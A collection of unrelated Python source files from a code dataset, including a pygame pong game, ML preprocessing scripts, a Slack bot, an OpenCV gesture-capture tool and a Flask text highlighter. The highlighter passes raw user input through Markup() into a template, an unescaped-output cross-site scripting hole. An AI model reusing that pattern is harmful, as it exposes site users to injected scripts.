self.ping_sound.play()\n\n self.rect.x += self.dx\n\n # 그리기\n def draw(self, screen):\n pygame.draw.rect(screen, RED, self.rect)\n\n\n# 적 객체\nclass Enemy(object):\n def __init__(self, pong_sound):\n self.rect = pygame.Rect(int(SCREEN_WIDTH / 2), 25, 50, 15)\n self.pong_sound = pong_sound\n\n # 업데이트\n def update(self, ball):\n # 적보다 공이 왼쪽에 있을 때\n if self.rect.centerx > ball.rect.centerx:\n diff = self.rect.centerx - ball.rect.centerx\n if diff <= 4:\n self.rect.centerx = ball.rect.centerx\n else:\n self.rect.x -= 4\n # 적보다 공이 오른쪽에 있을 때\n elif self.rect.centerx < ball.rect.centerx:\n diff = ball.rect.centerx - self.rect.centerx\n if diff <= 4:\n self.rect.centerx = ball.rect.centerx\n else:\n self.rect.x += 4\n # 적이 공과 충돌한 경우\n if self.rect.colliderect(ball.rect):\n ball.dy *= -1\n ball.rect.top = self.rect.bottom\n self.pong_sound.play()\n\n # 그리기\n def draw(self, screen):\n pygame.draw.rect(screen, BLACK, self.rect)\n\n\n# 게임 객체\nclass Game(object):\n def __init__(self):\n bounce_path = resource_path(\"assets\\\\bounce.wav\")\n ping_path = resource_path(\"assets/ping.wav\")\n pong_path = resource_path(\"assets/pong.wav\")\n font_path = resource_path(\"assets/NanumGothicCoding-Bold.ttf\")\n bounce_sound = pygame.mixer.Sound(bounce_path)\n ping_sound = pygame.mixer.Sound(ping_path)\n pong_sound = pygame.mixer.Sound(pong_path)\n self.font = pygame.font.Font(font_path, 50)\n self.ball = Ball(bounce_sound)\n self.player = Player(ping_sound)\n self.enemy = Enemy(pong_sound)\n self.player_score = 0\n self.enemy_score = 0\n\n # 게임 이벤트 처리 및 조작\n def process_events(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n return True\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n self.player.dx -= 5\n elif event.key == pygame.K_RIGHT:\n self.player.dx += 5\n elif event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\n self.player.dx = 0\n\n return False\n\n # 게임 로직 수행\n def run_logic(self):\n self.ball.update()\n self.player.update(self.ball)\n self.enemy.update(self.ball)\n\n # 공이 게임 화면 위로 넘어간 경우 (플레이어가 이긴 경우)\n if self.ball.rect.y < 0:\n self.player_score += 1\n self.ball.reset(self.player.rect.centerx, self.player.rect.centery)\n # 공이 게임 화면 아래로 넘어간 경우 (적이 이긴 경우)\n elif self.ball.rect.y > SCREEN_HEIGHT:\n self.enemy_score += 1\n self.ball.reset(self.enemy.rect.centerx, self.enemy.rect.centery)\n\n # 메시지 출력\n def display_message(self, screen, message, color):\n label = self.font.render(message, True, color)\n width = label.get_width()\n height = label.get_height()\n pos_x = int((SCREEN_WIDTH / 2) - (width / 2))\n pos_y = int((SCREEN_HEIGHT / 2) - (height / 2))\n screen.blit(label, (pos_x, pos_y))\n pygame.display.update()\n\n # 게임 프레임 출력\n def display_frame(self, screen):\n screen.fill(BLUE)\n\n # 플레이어 점수가 10점일 경우\n if self.player_score == 10:\n self.display_message(screen, \"승리!\", WHITE)\n self.player_score = 0\n self.enemy_score = 0\n pygame.time.wait(2000)\n # 적 점수가 10점일 경우\n elif self.enemy_score == 10:\n self.display_message(screen, \"패배!\", WHITE)\n self.player_score = 0\n self.enemy_score = 0\n pygame.time.wait(2000)\n else:\n self.ball.draw(screen)\n self.player.draw(screen)\n self.enemy.draw(screen)\n # 게임 중앙 점선\n for x in range(0, SCREEN_WIDTH, 24):\n pygame.draw.rect(screen, WHITE, [x, int(SCREEN_HEIGHT / 2), 10, 10])\n # 적 점수 표시\n enemy_score_label = self.font.render(str(self.enemy_score), True, WHITE)\n screen.blit(enemy_score_label, (10, 260))\n # 플레이어 점수 표시\n player_score_label = 
self.font.render(str(self.player_score), True, WHITE)\n screen.blit(player_score_label, (10, 340))\n\n\n# 게임 리소스 경로\ndef resource_path(relative_path):\n try:\n base_path = sys._MEIPASS\n except Exception:\n base_path = os.path.abspath(\".\")\n print(base_path)\n return os.path.join(base_path, relative_path)\n\n\ndef main():\n pygame.init()\n screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n pygame.display.set_caption(\"PingPong Game\")\n clock = pygame.time.Clock()\n game = Game()\n\n done = False\n while not done:\n done = game.process_events()\n game.run_logic()\n game.display_frame(screen)\n pygame.display.flip()\n clock.tick(FPS)\n\n pygame.quit()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"pygame/suanlab/5_Ping_Pong_Game/pingpong_game.py","file_name":"pingpong_game.py","file_ext":"py","file_size_in_byte":7362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"458304152","text":"import os\nfiles = os.listdir('/search/odin/guobk/data/data_polyEncode/vpa/train/')\nfiles = [os.path.join('/search/odin/guobk/data/data_polyEncode/vpa/train',file) for file in files]\nfor i in range(len(files)):\n print(i)\n R = []\n with open(files[i],'r') as f:\n s = f.read().strip().split('\\n')\n tok = '1'\n for j in range(len(s)):\n if s[j][0]!=tok:\n continue\n t = s[j].split('\\t')\n R.append('\\t'.join([t[0]]+t[2:]+[t[1]]))\n tok = str(1-int(tok))\n if len(R)%2!=0:\n R = R[:-1]\n with open(files[i],'w') as f:\n f.write('\\n'.join(R))\n\n\n\n\n# cache_file=\"/search/odin/guobk/data/data_polyEncode/ubuntu_data/train0.txt_[join_str]maxlen30_maxhis4_samplecntNone.cache\"\n# trainfile=\"/search/odin/guobk/data/data_polyEncode/ubuntu_data/train0.txt\"\n# with open('/search/odin/guobk/data/data_polyEncode/ubuntu_data/train1.txt','r') as f:\n# s0 = f.read().strip().split('\\n')\n# R0 = []\n# R1 = []\n# for i in range(len(s0)):\n# with open(trainfile,'w') as f:\n# f.write('\\n'.join(s0[:-(i+1)]))\n# train_dataset = SelectionDataset(os.path.join('/search/odin/guobk/data/data_polyEncode/ubuntu_data', 'train{}.txt'.format(0)),context_transform, response_transform, sample_cnt=None)\n# train_dataloader = DataLoader(train_dataset,batch_size=32,collate_fn=train_dataset.batchify_join_str,shuffle=True)\n# os.remove(cache_file)\n# try:\n# for step, batch in enumerate(train_dataloader, start=1):\n# print(step)\n# R0.append(s0[i])\n# break\n# except:\n# R1.append(s0[i])\n\ncache_file=\"\"\ntrain_dataset = SelectionDataset(os.path.join('/search/odin/guobk/data/data_polyEncode/vpa/train', 'train-{}.txt'.format('0')),context_transform, response_transform, sample_cnt=None)\ntrain_dataloader = DataLoader(train_dataset,batch_size=32,collate_fn=train_dataset.batchify_join_str,shuffle=True)\n# os.remove(cache_file)\nfor step, batch in enumerate(train_dataloader, start=1):\n print(step)\n\nwith open('/search/odin/guobk/data/data_polyEncode/vpa/train.txt','r') as f:\n S = f.read().strip().split('\\n')\nS = [s.split('\\t') for s in S]\nR = []\ni = 0\nr = []\nquery = ''\ndoc_pos = ''\ndoc_neg = ''\nwhile i c and d > a and c+d > a+b and c > 0 and d > 0 and a % 2 == 0: #testa condição\n print(\"Valores aceitos\")\nelse:\n print(\"Valores nao aceitos\")","sub_path":"Uri-Online-Judge/Wellington/Python/Iniciante/1035.py","file_name":"1035.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"603938385","text":"\"\"\"Flask module\nfile: __init__.py\ndate: 
12.12.2012\nauthor smith@example.com\nlicense: MIT\"\"\"\n\nfrom flask import Flask, render_template, request, Markup\n\n\ndef create_app():\n \"\"\"Create flask app for binding.\"\"\"\n app = Flask(__name__)\n\n template_file_name = 'index.html'\n\n @app.route('/', methods=['GET'])\n def index():\n return render_template(template_file_name)\n\n @app.route('/', methods=['POST'])\n def process():\n search_text = request.form['search']\n text = request.form['text']\n is_sensetive = request.form.get('is_sensetive', '0')\n highlighted_text = highlight_text(text, search_text, is_sensetive)\n result = {'text': text,\n 'highlighted_text': Markup(highlighted_text),\n }\n return render_template(template_file_name, **result)\n\n def markup_text(text):\n \"\"\"Markup given text.\n This is supplementary method that helps you to wrap marked text in tags.\n @:param text - string text to be marked\n @:return marked text, e.g., <mark>highlighted text</mark>.\"\"\"\n result = \"<mark>\" + text + \"</mark>\"\n return result\n\n def replacement_list(expr, text):\n \"\"\"Conducts text processing to obtain all forms of the search text.\n @: param text - the text of the line to be marked\n @: return a list of unique word forms.\"\"\"\n result = []\n index = 0\n while index >= 0:\n index = text.lower().find(expr.lower(), index)\n if index < 0: break\n separator = ''\n result.append(separator.join([text[x] for x in range(index, index+len(expr))]))\n index += len(expr)\n result = set(result)\n return result\n\n def highlight_text(text, expr, is_sensetive='0'):\n \"\"\"Markup searched string in given text.\n @:param text - string text to be processed (e.g., 'The sun in the sky')\n @:param expr - string pattern to be searched in the text (e.g., 'th')\n @:return marked text, e.g., \"<mark>Th</mark>e sun in <mark>th</mark>e sky\".\"\"\"\n if is_sensetive == '1':\n text = text.replace(expr, markup_text(expr))\n else:\n replacement = replacement_list(expr, text)\n for token in replacement:\n text = text.replace(token, markup_text(token))\n return text\n\n return app\n","sub_path":"highlighter/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"596970947","text":"#!/usr/bin/python3\n\nimport os\nimport sys\n\nPATH=\"/var/books\"\n\ndef capitalize_titles(books):\n for book in books:\n os.rename(PATH+os.sep+book,PATH+os.sep+book.title()+\".pdf\")\n print(\"Renamed {}\".format(book))\n\ndef get_books(path):\n books=list()\n for book in os.listdir(path):\n books.append(book)\n return books\n \ndef main():\n book_list=get_books(PATH)\n if book_list:\n print(\"Renaming {} books\".format(str(len(book_list))))\n print()\n capitalize_titles(book_list)\n else:\n print(\"Some error occured, books list is empty\")\n sys.exit(1)\n \nif __name__ ==\"__main__\":\n main()\n","sub_path":"cli-apps/format_books_titles.py","file_name":"format_books_titles.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"442718040","text":"\r\nimport pdb\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.functional as F\r\nimport torch.optim as optim\r\nfrom collections import OrderedDict\r\nfrom functools import reduce\r\nfrom torchvision import datasets, transforms\r\nimport matplotlib.pyplot as plot\r\n\r\nclass Autoencoder(nn.Module):\r\n\r\n def __init__(self, input_size=784):\r\n super(Autoencoder, self).__init__()\r\n self.input_size = input_size\r\n\r\n\r\n 
self.encoder = nn.Sequential(OrderedDict({\r\n 'lin_1': nn.Linear(input_size, 500),\r\n 'relu_1': nn.ReLU(),\r\n 'lin_2': nn.Linear(500, 100),\r\n 'relu_2': nn.ReLU(),\r\n }))\r\n\r\n self.decoder = nn.Sequential(OrderedDict({\r\n 'lin_1': nn.Linear(100, 500),\r\n 'relu_1': nn.ReLU(),\r\n 'lin_2': nn.Linear(500, 784),\r\n 'relu_2': nn.ReLU(),\r\n }))\r\n\r\n \r\n def forward(self, x):\r\n x = x.view(-1, self.input_size)\r\n enc_z = self.encoder(x)\r\n dec_out = self.decoder(enc_z)\r\n return dec_out, enc_z\r\n\r\n'''\r\n\r\ntrain_loader = torch.utils.data.DataLoader(\r\n datasets.MNIST('/files', train=True, \r\n transform=transforms.Compose([\r\n transforms.ToTensor(),\r\n transforms.Normalize((0.1307,), (0.3081,))\r\n ]), download=True),\r\n batch_size=64, shuffle=True)\r\n \r\n\r\ntest_loader = torch.utils.data.DataLoader(\r\n datasets.MNIST('/files', train=False, \r\n transform=transforms.Compose([\r\n transforms.ToTensor(),\r\n transforms.Normalize((0.1307,), (0.3081,))\r\n ]), download=True),\r\n batch_size=1, shuffle=True)\r\n \r\nautoenc = Autoencoder().cuda()\r\nautoenc.load_state_dict(torch.load('autoencoder_mnist.pt'))\r\n\r\nopt = optim.Adam(autoenc.parameters(), lr=1e-3 )\r\nloss_fn = nn.MSELoss()\r\n\r\nfor e in range(1):\r\n loss_ep = 0\r\n for batch_x, batch_y in train_loader:\r\n batch_x = batch_x.cuda()\r\n\r\n pred, _ = autoenc.forward(batch_x)\r\n\r\n opt.zero_grad()\r\n loss = loss_fn(pred, batch_x.view(-1, 784))\r\n loss.backward()\r\n opt.step()\r\n loss_ep += loss.item()\r\n loss_ep /= len(train_loader)\r\n print('Epoch {} with loss {}'.format(int(e), loss_ep))\r\n\r\n torch.save(autoenc.state_dict(),\"autoencoder_mnist.pt\")\r\n\r\nwith torch.no_grad():\r\n for batch_x, batch_y in test_loader:\r\n batch_x = batch_x.cuda()\r\n pred, _ = autoenc.forward(batch_x)\r\n pred = pred.view([28,28]).cpu().numpy()\r\n batch_x = batch_x.view([28,28]).cpu().numpy()\r\n\r\n plot.subplot(211)\r\n plot.imshow(batch_x)\r\n plot.subplot(212)\r\n plot.imshow(pred)\r\n plot.show()\r\n'''","sub_path":"ga-mnist/Autoencoder.py","file_name":"Autoencoder.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"154718140","text":"class Solution:\n def nextPermutation(self, nums) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n r = len(nums)-1\n while r > 0 and nums[r-1] >= nums[r]:\n r -= 1 \n if r == -1 or r == 0:\n nums.reverse()\n else:\n temps = sorted(nums[r-1:])\n index = temps.index(nums[r-1])\n for val in temps:\n if val > temps[index]:\n subs = val\n break\n index = nums[r:].index(subs) + r\n print(index)\n temp = nums[r-1]\n nums[r-1] = subs\n nums[index] = temp\n temps = nums[r:]\n temps.sort()\n nums[r:] = temps\n\na=Solution()\nb = [1,3,2]\na.nextPermutation(b)\nprint(b)","sub_path":"leetcode/nextPermutation.py","file_name":"nextPermutation.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"274318325","text":"from slackeventsapi import SlackEventAdapter\nfrom slackclient import SlackClient\nimport json\nfrom imgurpython import ImgurClient\nimport random\nfrom picture import picture\nfrom picture2 import picture2\nfrom flask import Flask,jsonify,abort,request\nimport threading as thd\n\napp = Flask(__name__)\n\n@app.route(\"/cc\")\ndef hello():\n return \"終於200了\"\n\ntokens = {}\nwith open('configs.json') as json_data:\n tokens = 
json.load(json_data)\n\n\nslack_events_adapter = SlackEventAdapter(tokens.get(\"slack_signing_secret\"), \"/slack/skr\", app)\nslack_client = SlackClient(tokens.get(\"slack_bot_token\"))\n\n@slack_events_adapter.on(\"message\")\ndef re_message(event_data):\n message = event_data[\"event\"]\n time = datetime.datetime.now().strftime('%H:%M')\n if message.get('text') == \"抽\":\n channel =message[\"channel\"]\n piclist = picture()\n list1 = random.sample(piclist, 1)\n list2 = \" \".join(list1)\n pic= [{\"title\": \"給你提提神~\", \"image_url\": list2}]\n slack_client.api_call(\"chat.postMessage\", channel=channel, attachments=pic)\n return 0\n if message.get('text') == \"抽帥哥\":\n channel =message[\"channel\"]\n piclist = picture2()\n list1 = random.sample(piclist, 1)\n list2 = \" \".join(list1)\n pic= [{\"title\": \"給你提提神~\", \"image_url\": list2}]\n slack_client.api_call(\"chat.postMessage\", channel=channel, attachments=pic)\n return 0\n if message.get('text') == \"q\":\n channel = message[\"channel\"]\n message = (\"洗頻\\n洗頻\\n洗頻\\n洗頻\\n洗頻\\n洗頻\\n洗頻\\n洗頻\\n洗頻\\n洗頻\\n洗頻\\n洗頻\\n洗頻\\n洗頻\\n洗頻\\n\")\n slack_client.api_call(\"chat.postMessage\", channel=channel, text=message)\n return 0\n@slack_events_adapter.on(\"error\")\ndef error_handler(err):\n print(\"ERROR: \" + str(err))\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0',port=7000)","sub_path":"slackbot.py","file_name":"slackbot.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"143041491","text":"import sys\nimport os\nimport math\nimport time\n\nimport cv2\n# Get OpenCV version\n(major_ver, minor_ver, subminor_ver) = (cv2.__version__).split('.')\nimport numpy as np\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\nIMAGES_FOLDER = os.path.join(dir_path,'images')\n\n# Uncomment this to insert other ip address\n# webcamIP = input(\"insert IP Webcam ip Address \")\n# webcamIPVideoService = webcamIP + \"/video\"\n\n\n# Uncomment this to insert other ip address\n# video = cv2.VideoCapture(webcamIPVideoService)\n\nclasses = {\n 0: 'A',\n 1: 'B',\n 2: 'C',\n 4: 'D',\n 5: 'METAL'\n}\n\nCURR_POSE = 'E'\n# DATA = 'validation_data'\n# Image count for file name\nimg_count = 0\n\n# Set up Tracker ----------------------------------------\ndef setup_tracker(ttype):\n tracker_types = ['BOOSTING', 'MIL', 'KCF', 'TLD', 'MEDIANFLOW', 'GOTURN']\n tracker_type = tracker_types[ttype]\n\n if int(minor_ver) < 3:\n tracker = cv2.Tracker_create(tracker_type)\n else:\n if tracker_type == 'BOOSTING':\n tracker = cv2.TrackerBoosting_create()\n if tracker_type == 'MIL':\n tracker = cv2.TrackerMIL_create()\n if tracker_type == 'KCF':\n tracker = cv2.TrackerKCF_create()\n if tracker_type == 'TLD':\n tracker = cv2.TrackerTLD_create()\n if tracker_type == 'MEDIANFLOW':\n tracker = cv2.TrackerMedianFlow_create()\n if tracker_type == 'GOTURN':\n tracker = cv2.TrackerGOTURN_create()\n\n return tracker\n\n\n# Helper function for applying a mask to an array ------\ndef mask_array(array, imask):\n if array.shape[:2] != imask.shape:\n raise Exception(\"Shapes of input and imask are incompatible\")\n output = np.zeros_like(array, dtype=np.uint8)\n for i, row in enumerate(imask):\n output[i, row] = array[i, row]\n return output\n\n\n# Begin capturing video -------------------------\nvideo = cv2.VideoCapture(\"http://192.168.1.3:8080/video\")\nif not video.isOpened():\n print(\"Error: Could not open video\")\n sys.exit()\n\n\n# Read first frame\nok, frame = 
video.read()\nif not ok:\n print(\"Error: Could not read video\")\n sys.exit()\n# Use First frame as initial background frame\nbg = frame.copy()\n\n\n# Kernel for erosion and dilation of masks\nkernel = np.ones((3,3), np.uint8)\n\n\n# Tracking\n# Bounding Box -> (TopRightX, TopRightY, Width, Height)\nbbox_initial = (200, 130, 240, 240)\nbbox = bbox_initial\n# Tracking status, -1 for not tracking, 0 for unsuccessful tracking, 1 for successful tracking\ntracking = -1\n\n\n# Text display positions\npositions = {\n 'hand_pose': (15, 40),\n 'fps': (15, 20)\n}\n\n\n\n\n\n# Capture, Process, display loop\nwhile True:\n # Read a new frame\n ok, frame = video.read()\n display = frame.copy()\n if not ok:\n break\n\n # Start timer\n timer = cv2.getTickCount()\n\n # Processing ---------------------------\n # First find the absolute difference between the two images\n diff = cv2.absdiff(bg, frame)\n mask = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)\n # Threshold the mask\n th, thresh = cv2.threshold(mask, 30, 255, cv2.THRESH_BINARY)\n # Opening, closing and dilation\n opening = cv2.morphologyEx(thresh, cv2.MORPH_OPEN, kernel)\n closing = cv2.morphologyEx(opening, cv2.MORPH_CLOSE, kernel)\n img_dilation = cv2.dilate(closing, kernel, iterations=2)\n # Get mask indexes\n imask = img_dilation > 0\n # Get foreground from mask\n foreground = mask_array(frame, imask)\n foreground_display = foreground.copy()\n\n # if tracking is active, update the tracker\n if tracking != -1:\n tracking, bbox = tracker.update(foreground)\n tracking = int(tracking)\n\n # Use numpy array indexing to crop the foreground frame\n hand_crop = img_dilation[\n int(bbox[1]):int(bbox[1]+bbox[3]),\n int(bbox[0]):int(bbox[0]+bbox[2])\n ]\n\n # Draw bounding box\n p1 = (int(bbox[0]), int(bbox[1]))\n p2 = (int(bbox[0] + bbox[2]), int(bbox[1] + bbox[3]))\n cv2.rectangle(foreground_display, p1, p2, (255, 0, 0), 2, 1)\n cv2.rectangle(display, p1, p2, (255, 0, 0), 2, 1)\n\n # Calculate Frames per second (FPS) ---------------------\n fps = cv2.getTickFrequency() / (cv2.getTickCount() - timer)\n # Display FPS on frame\n cv2.putText(\n foreground_display,\n \"FPS: \" + str(int(fps)),\n positions['fps'],\n cv2.FONT_HERSHEY_SIMPLEX,\n 0.65,\n (50, 170, 50),\n 2\n )\n cv2.putText(\n display,\n \"FPS: \" + str(int(fps)),\n positions['fps'],\n cv2.FONT_HERSHEY_SIMPLEX,\n 0.65,\n (50, 170, 50),\n 2\n )\n\n # Display result ---------------------------\n cv2.imshow(\"display\", display)\n # Display diff\n #cv2.imshow(\"diff\", diff)\n # Display thresh\n #cv2.imshow(\"thresh\", thresh)\n # Display mask\n #cv2.imshow(\"img_dilation\", img_dilation)\n try:\n # Display hand_crop\n cv2.imshow(\"hand_crop\", hand_crop)\n except:\n pass\n # Display foreground\n #cv2.imshow(\"foreground_display\", foreground_display)\n\n # Listen for Key Input --------------------\n k = cv2.waitKey(1) & 0xff\n\n if k == 27:\n # escape pressed\n break\n elif k == 114 or k == 112:\n # r pressed (reset background)\n bg = frame.copy()\n bbox = bbox_initial\n tracking = -1\n elif k == 116:\n # t pressed\n # Initialize tracker with first frame and bounding box\n tracker = setup_tracker(2)\n tracking = tracker.init(frame, bbox)\n elif k == 115:\n # s pressed\n img_count += 1\n fname = os.path.join(\n IMAGES_FOLDER,\n CURR_POSE,\n '{}_{}.jpg'.format(CURR_POSE, img_count)\n )\n print(fname)\n cv2.imwrite(fname, hand_crop)\n # elif k == 255: 
print(k)\n\ncv2.destroyAllWindows()\nvideo.release()\n","sub_path":"data-collection.py","file_name":"data-collection.py","file_ext":"py","file_size_in_byte":5832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"227715166","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\ndf = pd.read_csv(\".\\dustVisual.csv\", encoding=\"ANSI\")\nplt.title('O3 and PM10 matrix of scatterplot')\nplt.xlabel('O3')\nplt.ylabel('PM10')\n\nx0=df['O3']\nx1=df['PM10']\nplt.scatter(df['O3'],df['PM10'])\nplt.show()\n\n","sub_path":"Visualo3Pm10scattermatrix.py","file_name":"Visualo3Pm10scattermatrix.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"284649957","text":"#less than 16: you can't drive\n#16 to 17: drive not vote\n#18 to 24: vote but not rent a car\n#older than 25: whatever dude\n#no else/ elif, only and or\n\nuinput = raw_input(\"Enter your age: \")\n\nage = int(uinput)\n\n\"\"\"if age <= 15: # If the guy is 16, he'll get here.\n print(\"No driving.\")\n \nif age == 16 or age == 17:\n print(\"driving, no voting.\")\n \nif age >= 18 and age <=24:\n print(\"vote yes, rental car no\")\n \nif age >= 25:\n print(\"you free.\")\"\"\"\n \nif age <= 15:\n print(\"no fun.\")\nelse:\n if age == 16 or age == 17:\n print(\"some fun.\")\n else:\n if age >= 18 and age <= 24:\n print(\"most fun, no rental cars.\")\n else:\n print(\"you're free.\")\n\n\n# Let's split this assignment in 3 different ones:\n# 11.a: No else, no elif. Just if\n# 11.b: Just if and else. nested statements\n# 11.c: Everything. If, elif and else.\n\n#\n\n\"\"\"elif age == 16 or age == 17: \n print(\"Driving, no voting.\")\n \nelse age >= 18 and age <= 24:\n print(\"Vote yes, rental car no.\")\n \nelse:\n print(\"You free.\")\"\"\"\n ","sub_path":"class-3/assignments/assignments_kellie/ex11.py","file_name":"ex11.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"383440898","text":"from BaseClass.EntityList import EntityList\nfrom BaseClass.EntityHandler import EntityHandler\nfrom BaseClass.APIRequest import APIRequest\n\nfrom Entity.Bug.Bug import Bug\n\nclass ProjectBugsHandler(EntityHandler):\n\n\t_projectID = None\n\n\tdef __init__(self, origin, projectID):\n\t\tsuper().__init__(origin)\n\n\t\tself._projectID = projectID\n\n\tdef create(self, fields):\n\t\tsuper().create(fields)\n\n\t\tsupports = {\n\t\t\t'title' : True,\n\t\t\t'status_id' : True,\n\t\t\t'severity_id' : True,\n\t\t\t'project_version' : True,\n\t\t\t'project_version_id' : True,\n\t\t\t'project_section_id' : False,\n\t\t\t'type_id' : False,\n\t\t\t'reproducibility_id' : False,\n\t\t \t'priority_id'\t\t : False,\n\t\t\t'assigned_user_id' : False,\n\t\t\t'description' : False,\n\t\t\t'expected_results' : False,\n\t\t\t'steps' : False,\n\t\t\t'platform' : False\n\t\t\t# 'device_model' : False,\n\t\t\t# 'device_model_id' : False,\n\t\t\t# 'os' : False,\n\t\t\t# 'os_version' : False,\n\t\t\t# 'os_version_id' : False,\n\t\t\t# 'browser_version_id' : False\n\t\t}\n\n\t\tif 'project_version_id' in fields.keys():\n\t\t\tsupports['project_version'] = False\n\t\telif 'project_version' in fields.keys():\n\t\t\tsupports['project_version_id'] = False\n\n\t\tif self.enforce(fields, supports):\n\t\t\tinitFields = {'include': 'steps,platform'}\n\t\t\tinitFields.update(fields)\n\t\t\tfields = initFields\n\n\t\t\treq 
= APIRequest(\n\t\t\t\tself._origin,\n\t\t\t\t'/v1/projects/' + str(self._projectID) + '/bugs',\n\t\t\t\t'POST',\n\t\t\t\t{'params': fields}\n\t\t\t)\n\n\t\t\treturn Bug(self._origin, req.exec_())\n\n\tdef all(self, filters = None):\n\t\tif filters is None:\n\t\t\tfilters = {}\n\n\t\tsuper().all(filters)\n\n\t\tinitFilters = {'include': 'steps,platform,attachments,comments,tags'}\n\t\tinitFilters.update(filters)\n\t\tfilters = initFilters\n\n\t\trequest = APIRequest(self._origin, '/v1/projects/' + str(self._projectID) + '/bugs', 'GET')\n\t\treturn EntityList(self._origin, request, Bug, filters)\n","sub_path":"leantesting/Handler/Project/ProjectBugsHandler.py","file_name":"ProjectBugsHandler.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"144349316","text":"import os\nfrom ConvPool import *\n\n\ndef exampleTestFilters():\n # List of filters for a 2D example\n edge2dFilter = np.array([[1, 1, 1],\n [1, -8, 1],\n [1, 1, 1]])\n\n sharpered2dFilter = np.array([[0, -1, 0],\n [-1, 5, -1],\n [0, -1, 0]])\n\n # List of filters for a 3D example\n sharpered3dFilter = np.array([[[0, 0, 0], [-1, -1, -1], [0, 0, 0]],\n [[-1, -1, -1], [5, 5, 5], [-1, -1, -1]],\n [[0, 0, 0], [-1, -1, -1], [0, 0, 0]]])\n sharpered3dFilterGreen = np.array([sharpered3dFilter - 1, sharpered3dFilter, sharpered3dFilter - 1])\n\n edge3dFilter = np.array([[[-1, -1, -1], [-1, -1, -1], [-1, -1, -1]],\n [[-1, -1, -1], [8, 8, 8], [-1, -1, -1]],\n [[-1, -1, -1], [-1, -1, -1], [-1, -1, -1]]])\n edge3dFilterRed = np.array([edge3dFilter - 1, edge3dFilter - 1, edge3dFilter])\n\n # Opening the image file\n filename = input('Enter the name of an image (absolute or relative path from {}): '.format(os.getcwd()))\n try:\n image2d = load2dImage(filename)\n image3d = load3dImage(filename)\n except:\n print('The file', filename, 'cannot be found or cannot be read')\n exit(1)\n\n # Image processing\n print('\\nProcessing image, it will take a while...\\n')\n ok = 0\n # 2D\n try:\n # Black and white image with padding and a 'sharped' filter\n saveImage('2dSharpered10Pad.jpg', convolution2d(image2d, sharpered2dFilter, 10))\n print('Generated 2dSharpered10Pad.jpg')\n ok += 1\n except:\n print('Error with 2dSharpered10Pad.jpg')\n try:\n # Black and white image with padding and a 'sharped' filter\n saveImage('2dEdge2Stride.jpg', convolution2d(image2d, edge2dFilter, 0, 2))\n print('Generated 2dEdge2Stride.jpg')\n ok += 1\n except:\n print('Error with 2dEdge2Stride.jpg')\n try:\n saveImage('2d4Pooled.jpg', pooling2d(image2d, 4, np.average))\n print('Generated 2d4Pooled.jpg')\n ok += 1\n except:\n print('Error with 2d4Pooled.jpg')\n\n # 3D\n try:\n saveImage('3dSharpered2Stride.jpg', convolution3d(image3d, sharpered3dFilterGreen, 0, 2))\n print('Generated 3dSharpered2Stride.jpg')\n ok += 1\n except:\n print('Error with 3dSharpered2Stride.jpg')\n try:\n saveImage('3dEdgeRed.jpg', convolution3d(image3d, edge3dFilterRed))\n print('Generated 3dEdgeRed.jpg')\n ok += 1\n except:\n print('Error with 3dEdgeRed.jpg')\n try:\n saveImage('3d2Pooled.jpg', pooling3d(image3d, 2, np.average))\n print('Generated 3d2Pooled.jpg')\n ok += 1\n except:\n print('Error with 3d2Pooled.jpg')\n\n print()\n print(ok, '/6 images generated\\n', sep='')\n print('Images saved on {}'.format(os.getcwd()))\n print('Done!')\n\n\nif __name__ == '__main__':\n print('Starting example test...')\n os.chdir(os.path.dirname(os.path.realpath(__file__)))\n 
